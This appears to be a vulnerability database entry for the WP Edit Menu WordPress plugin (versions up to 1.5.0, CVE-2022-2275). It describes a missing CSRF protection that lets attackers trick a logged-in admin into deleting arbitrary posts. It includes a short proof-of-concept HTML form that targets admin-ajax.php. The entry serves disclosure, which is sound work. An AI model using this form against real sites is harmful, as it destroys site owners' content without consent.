Lucene search
Johannes GangsรถWPEX-ID:07757D1E-39AD-4199-BC7A-ECB821DFC996HistoryAug 01, 2022 - 12:00 a.m.
WP Edit Menu <= 1.5.0 - Arbitrary Post Deletion via CSRF
2022-08-0100:00:00
Johannes Gangsรถ
78
wordpress
edit menu
csrf
arbitrary post deletion
EPSS
0.001
Percentile
25.9%
The plugin does not have CSRF in an AJAX action, which could allow attackers to make a logged in admin delete arbitrary posts/pages from the blog via a CSRF attack
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php?action= filter_menu" method="POST">
<input type="hidden" name="val[]" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Related
cvelist
cvelist
CVE-2022-2275 WP Edit Menu <= 1.5.0 - Arbitrary Post Deletion via CSRF
2022-08-22 15:00:37
prion
prion
Cross site request forgery (csrf)
2022-08-22 15:15:00
wpvulndb
wpvulndb
WP Edit Menu <= 1.5.0 - Arbitrary Post Deletion via CSRF
2022-08-01 00:00:00
nvd
nvd
CVE-2022-2275
2022-08-22 15:15:14
cve
cve
CVE-2022-2275
2022-08-22 15:15:14